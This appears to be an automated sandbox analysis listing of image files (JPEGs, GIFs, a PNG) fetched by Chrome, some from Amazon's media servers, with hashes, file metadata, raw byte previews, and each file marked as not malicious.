                                                                                                                                                                                                                                                                SHA1:CE3FDBA1299BC0BB6334D69834BA70B3902C386C
                                                                                                                                                                                                                                                                SHA-256:4B4541F7FDB52AC6782B41BDA2AD3809EC51E37707116A54D1DE52D93262FAA2
                                                                                                                                                                                                                                                                SHA-512:B268D578192B02F517DC5F4C302155AC6703CFBB111E9CCA996D62355A83F6D143B8BDD4D5430A7BEB43CCAE1ABCB3140E4AA7167E2BB478DD3E8ED1275F12BD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!"1...3AS....2QTUVs....$q..#Bar.4Rb.6Ec....................................................!.1AQR..#2a.....B.............?..=....$..L......'.....}.~...8....=R~.O...'..ZP...=R~.O...'..ZP...=R~.O...'..ZP...=R~.O...'..ZP...=R~.O...'..Z,..X........x...?........(.x...?........(.x...?..s.@0.I..]....%...X3Z..S..Js#......F.2..........p.]........P.MvzLo.L^\.S.y..=.6.dy./Y7.K.....g..B6^..l....h..-.C.J.....Mc.O.*b.4^.oh......{D..3........._Rk..}.|pE.&....1y./Y7.K....z.._~......Hw./.5.e>.>8"..X.S.J.......%...h.d../.L..Fz~$;.......S./.5.e?....z.._~.F..M.....O.g..D.xgD........o..l...wV$3..+`.b...).....z.._~.F..M.....O.g..CP.Z...(.-aQ......}.pE.&......z.._~.F..M.....O.g..C...}I.{)..>7...X.S.J.......%...h.d../.L..Fz~$G..X......d.....~..U.1...h.d../
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):92658
                                                                                                                                                                                                                                                                Entropy (8bit):7.948149613967599
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:fnAvuuA3l5o0u3Zp0wTMmcAyjL5s8POxnyx+3N7i3/kdmV/sq2apnNfweqZz6wr7:fkRMW0+klmEjL5fP4yxCNA/Ywsq2dZmG
                                                                                                                                                                                                                                                                MD5:744586DF892472843C31E081882DDB1B
                                                                                                                                                                                                                                                                SHA1:4A5E84553974BD7A43A63F99509FEE1EEF59DA20
                                                                                                                                                                                                                                                                SHA-256:18E50E9F054AB004A35C6FA0EA46C440D0DF1C6A1C3152262D3CF43B814DBFA5
                                                                                                                                                                                                                                                                SHA-512:E0FC2159EADA064F4E79326DD574B791BDE588CDC04AD02849F962C73D737A9C532CA933235197B238140604E9BFE4EC70C6EA349B5603DA0F29F11848F9F2C0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61EnuTSAVeL._SX1500_.jpg
                                                                                                                                                                                                                                                                Preview:......Exif..II*.................Ducky.......7.....2http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.11 (Macintosh)" xmpMM:InstanceID="xmp.iid:448DAF084B5811EF8C44DC556605C1E6" xmpMM:DocumentID="xmp.did:448DAF094B5811EF8C44DC556605C1E6"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2C8E13E74B5811EF8C44DC556605C1E6" stRef:documentID="xmp.did:2C8E13E84B5811EF8C44DC556605C1E6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............i:......i............................................................##########................#############
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 150x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8609
                                                                                                                                                                                                                                                                Entropy (8bit):7.956658248647633
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:5jpwEYOligZNdAMbqdIPoXe3fA8arDRTic+OtK1t5Q+BM9:ofOlXZNdAMuRMfParNTV+rX5I
                                                                                                                                                                                                                                                                MD5:E1B1AD46442C3043A775A06BEC183CD9
                                                                                                                                                                                                                                                                SHA1:21F50A8E1B7ECB67A47D1349C35F9224264ADEF2
                                                                                                                                                                                                                                                                SHA-256:27CB3E5F91BDE6602D4061C7AD9E1B8CC0A21B10C492E78F2064D264EBE12D08
                                                                                                                                                                                                                                                                SHA-512:EA26C309DE87FAF50DDE6C04EB8489F692862CF5A3FC44E7EFD2ED184A759BFEB39EA08379B121A0AE76F7E07DDDFE5A32923733F567119C5EE6A0D9FA6F20C0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1."AQ..2a.#BRbqr.....4t.$3Cc.....%5.d................................................!..1..2Qaq"4A......#....Br...............?.I...7z....o.......X.[@..w..".a..).w.g..A......k.".z...O.$..9.|o.Gm..............q..7.C.*..E$A... ...`....SK.....6...?..:.G.......z!;[.I.;.Ve........~....=j7...`x.u...&.}.3.G2i.E....cGN.>..!$+..VW`TD2B.>Ic.5.........ux..%.b$....Ywg9.s.=.ah....)........G.2p.7le..uq......."Z^.....3._...#......B.(....(.)..../.z]S...z|...JV.;9.EQ.=.aQ....7a...R...X.<..V..A8S.l...Q..K... R.!`...^......'x..X-Qqmr3.#s. .....J.......,....Z..A...lHK.f2.h..T\g...z..wg...p....0YY.?...;..!S7._mZ..S....l|Q.h..Zs...K......%.b.&1?4.,..[...A.H..*..\.<.qr%..0...4..p0.(.......zW.Z:...9..........QN.!E.Q.QE.B.QE...QD!E.Q.V.K....Bc-.'!..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1779
                                                                                                                                                                                                                                                                Entropy (8bit):7.618580132227298
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r9DMkaeL1Vq0E92zVboguooxh8V/uOx4:TCOeLvrmUlobT4oOx4
                                                                                                                                                                                                                                                                MD5:E1EBCF5EDB7C9FF71CF0E58D8A040BD3
                                                                                                                                                                                                                                                                SHA1:F811F86A245395ADB8C9A6604E38BF8587E37659
                                                                                                                                                                                                                                                                SHA-256:AE90D8D0286FBE0A5D5A8720EA72798EEADB8C9F2101C197FB2601890CC1B261
                                                                                                                                                                                                                                                                SHA-512:0C492DC805C2C984ED4F146C28F3E8E4347DB7BCC7B7F50C6FDFEF27574EAB8848E304C56537C22B88213B8EAF68E36DE8434875527282EE35751B15F115202C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........{......................................................!1Qq.A.."Ra....2..#$3Br..........................................!1............?...............*"..I.x.8.K...d..5..t....[.<'.o=...4&.....o...c.t......',...um.SA..K.~..7d..~.!0..................+..v......_.=Nc....p..`.m \.}.......8......N....cT...4.x..2O...^.vL.Dq\..............6.-.w.Z.m\$@\.<.......M\i..~X...<..p!L.S..-u...F...k. Z8".j.p{Z..sZGg...t%..,6z..,..E.............!A.j.k._I..TCp|...ej..,v....{.......Z5s>..I$9vIq....~.X........k......#.1Mr.n.4..4.!x....g...z1e.#..a..b...............!.w.QM...~I..[+..b.:B..k.j_.X.1t...U....................;=-.85s..t.|.^Z..........WP...'.#.Ygnz...v.ig.....K8..K.V..qi....x.........>..am.....k@..@7...Y......+.11...&W...4.}.\u..T.4t]..........Dm.=Ja...-{G.g..ky....9.f^....8.3t....2N;..V...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUnl/tExltxlHh/:/Ob/
                                                                                                                                                                                                                                                                MD5:58B6EAB85C3D693580CE3B2D5E559C37
                                                                                                                                                                                                                                                                SHA1:894476FCCD60AF0E4842D8657A36D8186E34A382
                                                                                                                                                                                                                                                                SHA-256:39F08C4011AC739FB84EB16366FB23338E4DF27D54A459327A95C99C03512FFD
                                                                                                                                                                                                                                                                SHA-512:E5E5C896EDB21F6A6F420055516877577F6EF4A00492CA9A76E72AA95D0BBAA2E86C4897C1EAE1D449E7B5DAF0EDB8D42E4CD8CF837FD9BA5859B2B833AE9020
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6576
                                                                                                                                                                                                                                                                Entropy (8bit):7.9293882439922125
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:BQwgNfaACgOFkst2IbQKVctvDvRAq570myvLExU4z:B8faEOFkO2IbTmbvRt0Bv8
                                                                                                                                                                                                                                                                MD5:48E88D3CBF3E0DFE82BE69B2954728B7
                                                                                                                                                                                                                                                                SHA1:43BC7C885BB409F7B60767A93D6570C0FA25AD3B
                                                                                                                                                                                                                                                                SHA-256:4B1AE086947A83ED34CDFB4CCE1C7D889AB38BC98D9D2180C64785A1E0C91B9F
                                                                                                                                                                                                                                                                SHA-512:42BE16D346BE81BA0A40442D5BB567FAA33AAE55DBFD3E2EA48262069FE87390D461D2B0A6E84DF5DD2540A7D9B98C4381A6A08369C4E8E3DAE103952B3E8DBC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1A.Qaq..."3U......#2BRrs.......4Cb...e.S.%Dc.................................................1R..!"2AQaq............?..=.,....TL....W..\.6...9..=.......O.U...z..N..JTV..\......Z...Gm;..9w>y..]...f.....z#?.V]........f.{.z.!~..<..Ssf....'..._t....DSzl..M.+?u..._.b...h..P...)}...]E.NG....x...?u....~5.DS..&..o.^jQ....8..#.N.A.s.....g.z.AQNG..n..)3.S.P.b..H..(+....)...UP......Z}..t....x.v....-...`H..Z(.)b.(1..)h1.+*(1.....h..(1.+(...1.......J.L/..b.....;)..(..1......O.U.7....O.j. o.5s.e....v.c....JZ)k.R..@.DVTQ...."....(....(...........)($...u.v..?..)..(... q......P.x..{....@.*j...-=..4.Om=X.Z)h.V..#kj....D%n%.T.....nUK..r...a.O;.n*.]o.j..@s.S.s..Aju.0..T..D.D%"t.L.n...n...0J...b`.0`.P..n.c...r..u...bM.-.\...Q!...*...8......)!-.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2467
                                                                                                                                                                                                                                                                Entropy (8bit):7.733842261280018
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6+hW4l5RsnbgZ8+P6zs7b7d3K4HkRyhVsxY7oZe5EbWl7qI:T54lWg++Pt7b7xkWjeK2I
                                                                                                                                                                                                                                                                MD5:B96056A01B73CB6077E417EAF6D4E3C3
                                                                                                                                                                                                                                                                SHA1:A460E89AD61BC1AACB66771C02C9ED8405D54B39
                                                                                                                                                                                                                                                                SHA-256:3C6E6089DD0486B2734E86E306E1E944B76A0E76FFE32D8C2669E6614C75A609
                                                                                                                                                                                                                                                                SHA-512:D2C3D315F2F139DB1FB6BBB8833C349008851DA9B28DD1D0410CA815B3E0A4F500EB59485D8CFA7B8CCF6E2B7D8FBEB2D11E7FE29BB98FA956CA9023AE6A3A5C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1.ABQq..."2a...#R........3Sb..................................................!.2"q1AQ............?..TD@...DD....M*....'%........r......a9....D.::....0d.........>...6."H...DD....D@...DD....D@...._.J..H..#.q..qn.......... .h*|..>G...82t..l<.....qix.....w..<.kF..D....F...n+.....iF..J.;.<..........=.2?..yj.L...j.#..0.J..e6.{..p.V........D.{.....]...H..#.0....CH0,..8....9.eka.[...U...SfM'...}.Y9..0..Y*Z....H...DD....D@...@..U.7.l.oD...>..x.'.G#.s.6?h.w....}$...a.?_3$.vm...za.|U....a..V-...W.....Fb.}19U<.?.q7.P../.b.}N....2....V.N..31...(..V......H.ed.J.j\..*..8../w!S.)~.WO.X..f...R.$w...;... ....:..0.Z,..J.........Z...z..uh.l.q.....56#..Lg....~.c...>.u............G.C..Q~.A.O..F.x6..F.j..h'.M.t..;.y.j).U........I..rc..Fg/..W(E.h.l..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1685
                                                                                                                                                                                                                                                                Entropy (8bit):7.264365815081339
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6pUQTE0Qop5Zt/Uf/PokOyYD4diebJeyO:TK3pw5ZtsHP3BHt9eL
                                                                                                                                                                                                                                                                MD5:26182EFBD4979DD69FE1EB517F9A39DC
                                                                                                                                                                                                                                                                SHA1:DC8D3C0A23239F449639292CEFDEB6BD5589000A
                                                                                                                                                                                                                                                                SHA-256:215741A74180546322A1586F0B660BBA2A5313116789021D9A204A084686ACED
                                                                                                                                                                                                                                                                SHA-512:C18C9F572C626F48CB8B4459DA1091A91E2B4821EF51BACE283CA275B41DF3B7C0128828630552125F350634156C2CE39CBBF0959357550624338A2A3832A14F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1.2Q.ABaq.."R......b..................................................!1...Q.3Aq$2BR...............?.....t@.............................................................zk[.MI..-.e.......*..d...l...}..U.."...'..,.G....k}...^{._Z.K.....C#..~.Z....l,...IF.FQ..Ku.&(.D..{...o.y..HC2...$..R\...W5.Az.....NMW...m.j{}vob^...t#.Gz..D............B.)N.q.....rQ.kg..m..>.t..Z...>HE...0.......c|.\.k..o.U'.G.X.]W9..6..p.,2...".%E..%.....o..Svw[4u..6<.DW.[{.9l.S"..Qt..../.....n...4...9=..oh....Z~.4|.o.7..l.xG..n'./...$(...D<.f.....'.....^8Z..yd..7..O&..,vO..pYV...Z..z....j..N}.....p..1.m.a..5r8.NQj..}..J?.tvp.../o..c.E...v.........Y..d..3..F-..v.......L.G.]'/"..6...kQ..AcA.ty.t.%q..OY:......I./.sSP....a.hY.d..F?.....~.(.....~....vNDT.z..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 134x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):10747
                                                                                                                                                                                                                                                                Entropy (8bit):7.963460359690359
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:ZHKcyFob3gggMxcIKE2cdJ/sUyzAWWOLPAz+5+Euum9Uu6JGALDEkxN3:ryFobQmcIKEJBy8WBjAz+5lRFuQFN3
                                                                                                                                                                                                                                                                MD5:89B814F71597E4227DD46FFAA2217319
                                                                                                                                                                                                                                                                SHA1:C04AFADE270EFC23BDF2EB5F797127310D904694
                                                                                                                                                                                                                                                                SHA-256:0A49DD26D30224783661936ECF3CAA16A63089DAF7B1CFF085CC056925138BBC
                                                                                                                                                                                                                                                                SHA-512:7ADFC7C5B683EB0376EDB45AE20047A539B746DB9DAD29AA2479564FA41FF504020B860F5B7F00A0C53B03DA20B33375E3A697F79BCA8E7CEF9E2DF6D4BF7A6D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/81B7s-7r48L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.."1.A.2Q#3Baqu.......$4RTU.bs.......Cr..5.......c................................................!1.Qq...24ARa.."rs..S.....#3..............?..P.D.....A......uA./..b...;1..A.....A......q.;s%.{..vr8_.....T.....".....(=..S.h.i\"I............y...y..-.L.(...J..u.%.s...1..D."..#..;r....D.......3...4)K.5..........V.............E....:.N......{.'.....I.._..?.W."O..^.(...e.&Db.1...$......Q.t%)..a..`? G....+..'.a~v..!_.?..l.< ....*..xh a..e......tRt.o*?...#..J.v..!_.?...'.....I...!...O..QO..1......M..h..F<.....J.....\...Z....[.Af...>...hE....+..'.c1.........B...Y)C....$../...yG......#.x.<.-~a.<.....M[.E}~..._....K..5;z.........?j..dl.Q[5.7*....r....@...`.q.I.].T.].0....o.L.t...y..<U...0=..P}..+...N,..J5..o..;<M.....7..l.'....Fd+./.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 209x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9100
                                                                                                                                                                                                                                                                Entropy (8bit):7.947630269010226
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:vcjwFvzAiergOZ2EFpNUOKqJg1+1seqphTTAYnvDj:vcEzJEFjdO1w8pZAmX
                                                                                                                                                                                                                                                                MD5:BD1D9D79EFA118CA21C92CC0D5571BD0
                                                                                                                                                                                                                                                                SHA1:CE67EEEB31ED88C64A5AF3DA3234594C5FABD789
                                                                                                                                                                                                                                                                SHA-256:60AA01A76C19BDEBE77A6EFDF8DFAA7BE227BD257D1A3465C2E55CB7124907A2
                                                                                                                                                                                                                                                                SHA-512:186D5E6C87F3043BDEACE81AB7EFA3DF6DF47B9555703F12E9E0A6D7B58F5A7391DAF1E5450262F862CA1FBDB4F8A6D8890F92085865A66E0CC8AFCBF61DC2F9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1.."AQ..aq#2.....BRb....3S.....$C.....E...................................................!1AQ"Raq................?..(..(.....(..(..(..n;T{;i..*.yv..,p.....K.....5+t{.....h...nLE..R.8.&v!!..7.....k..i..... .^..D(...yT.?.4..vk..v..........VS...FNm.`a.....:%u.....XZ..p;..'..7..v.....*ye.c...M.nf.F...=..m..K.....R......GCr....^...o..~.X.Ey....I..=7F.....T.`7....jV=.. .l7.+..?y..NX...yO...<.......=..r[.*..1..P~..\,WJ....VS.3..v..;t../e|..v.%Q.o ...<..u.F......pMe.cQE.D..Q@.QE.QE..E.P..Q@.QE.QE..E.P..Q@..}..f.n.?.a.....NJwHW...N.Q.y...k[..Oi..."w...0e...G/......M.A.....YD.zM6..>(.......i."..........g...+.9v....ww .ZG%.2I....QE.\.Ew..N.$r++........ .8 .&j.7]...D.......|....<.+I...'..2WY....5......t...%{.s.,..".j.P.3c...j6..@wG2+)....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 153x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4777
                                                                                                                                                                                                                                                                Entropy (8bit):7.914304731785313
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:T6Z29tAuzp8hc8iRW+ytItDDpL8pJr0BpAF3R2w6B8C3G1+jB:bdzuc8fwDtQgpAFw9FB
                                                                                                                                                                                                                                                                MD5:B5F3E877DA543ABAF0A51BAED47A71F2
                                                                                                                                                                                                                                                                SHA1:57DB0A4CCE7EDFC7D1FEF6651BC61BAEE77ABB3C
                                                                                                                                                                                                                                                                SHA-256:AFD146E8174EDACB8E40A2858A3A68CF6A963C06E70A74E3D8921D96A2B638FF
                                                                                                                                                                                                                                                                SHA-512:0C00268A3C67BC919E7F783CF34A607C4A432F9795FD633219A05CFF93D6C4F20BD312946538F3AE08DDA4A61420C49B122AE4EE349823003166443DCCF84842
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61-jK4RR+mL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!1A..Qaq.".......23BRr.#bs.....c....%5ET....$4..................................................1.!2.#3A.Q."BR............?..Y0.kiZ4.p..I-..V{..&......p.j3.L.].'2...m1S&5.k..q...Z..j..).n+,.W....+..b..Y.7.W..$2.3qs.r.t..7m&4n..K..{.....v...C./...g.*#....j......~WZ.x..ThR..:.._.7(../.......A...EjV.d.....+..E......5..~R...R.]..k.'......./j....g......zl.Mq..5.c..eh...j7.......4...+.........P..OK[..m5..C.B22.....o...lx.sZ...S..~%-Q....{..nV...x....J.[.....C.....H..UFn.....<..vh...{.....J.~e.G..u.R..) Y+.u..V..c.W..S....U.k........F.......f......s...dS...B.....z...m.V...jn ............v..d....n*.........Iegj.#....[....v..h......\.tk.2..............i...5{D-...n...&..:8U.J..Y.u...4...k8......u;E.X.-2...^U.LE..p..>I..j..uO.F...].a>.....C.'NR
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6560
                                                                                                                                                                                                                                                                Entropy (8bit):7.938477882981532
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TFJy1PHWOYwCZBSJl1s5DlMC9lKDIwFpBKiT8aUyyujvyTN7kCo20hJ/pm45Saiw:68OmWl1s5DrKUwFyirbeB7FGB7AafJD5
                                                                                                                                                                                                                                                                MD5:0104AF5BED12A82E598BEE79999C94EB
                                                                                                                                                                                                                                                                SHA1:0B69A809EC785424B7D9D9DF758B61661F9A5D4A
                                                                                                                                                                                                                                                                SHA-256:BCC904EC7847E64D5F0AF6D71DCC08C8A133570B272A81B30F2561AADA1680D2
                                                                                                                                                                                                                                                                SHA-512:38A8138D68D12CABBCF8263B60D427F52936DDA2EC8E452389F328626D13E662DCBEC3B50B5AF35807B3D0E25F9D09B81C7CA581F7C01236F7579BEB01D276F7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..AQq."2Ra....#Bbr..C....34......%..DSs..................................................!1A.."a2....Qq..............?..tQE.QE..E.P..Q@.Qqy....'..$...,..c..|[..T.9x);.Z...c.b..'...hW.[.i.!y........o...K.-......._...p.#z..G3k....<Y..7........%?SQm......s'.......u.......W..)..W..Q...-7...l.6..,.{. 3.U.o1...2i.....j.qY..7...x`..{a.sj..{..p!P....&..>.rI...9..M..Jm,.............W.xT..*I......k......V...y..X].....u}....7{Cum.j...\../&#,......5>.[kt..F`N.C.....V...fk.,..A..W..E(....-..... a..'.4.Z.x)\.[..nu.......%[OZ"...nR&k].Y.].f.s.....!..n.....5..sqp.;..?.N...sm"Z......pIR;..{..h..S.M.R,.2[...u.....~..Gu-[.%.........Q@.QE.QE..E.P..Q@.Q\..m..y.gu..o.@t........R$...c...3.~..3k..._....q.X..V...i.^.@./...-.."4Ln...78...zd..w..r...w
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 204 x 201, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):13009
                                                                                                                                                                                                                                                                Entropy (8bit):7.966097615657002
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:zLyH9t/CoXuz+4aIg1BSDUuk3ArwkPi6IR9eH2U50Zw3yB2aWFO+6+CDE1DYFy:XyH9Sg1BAUrwrwklIR4Wb4haBQKU
                                                                                                                                                                                                                                                                MD5:C9F8088EA9142D2191E3EC95D0BD5D52
                                                                                                                                                                                                                                                                SHA1:EB5B16871B058CE5F1B4EF2446410DA81DFB311A
                                                                                                                                                                                                                                                                SHA-256:A18087E0B73C5713577320D4E76A1EA9563F2A880AA4760D7B55891F8785B677
                                                                                                                                                                                                                                                                SHA-512:24354A98B1555BD7141403BA0D0706F0A2154B03BFB22DAE5450ED4C763F5AE182BC576ED9C21B1306FF29FF2390F6F0E824F504F5B3F3C23CD7485E3FEA77CE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.............o..A.. .IDATx^.y|.U.........@....mR..(...n..M!.D.QH...B/;..K..../T6.*....P...M6Y.7.L.9..7...YZ...y.u_Mf..{3.9.y..<......p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8....=........M.&..Rj.6..O>.+.........-......mmwT..+.>....k.pl)..`<.o.........5.W...Y5W>v._.....MzS.QEEe3.U@......^s.e...._{.cs2..3f....)..."...8...._{..<{...1P...Y..1..4.{..r3..Q...dM4'.."..k.X..G|........^k.;Wod.=7...d..~~.fL.au.m.......`..{.Z.,.Z."`E...2).....\...t.....S.R.2+r...k/l\...8...Y...`..."....y...v.\..z...~..e..h.<.M....l.y_.[?6..k7|z......'.E0g...0.'Y+.D#y.H".|.32....^..K.<k...Y`.....m..*....Ll1.....~.#?.n...;.}.Y...=.........B.......p...\y...w.n.....o...v.c!.-...c.Th........+.;7...z...`..Y.G..0....kDHY+.].......hvz_j,p.X..-...X.b.X...s_...M..9....8.&(.Y"x...I.[....t7.R6.cW.\u.........@)..cK.[bk.c..Bd.u....W{../.U0W.;/.....kew+IOb;..].."..+..:$.}n
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
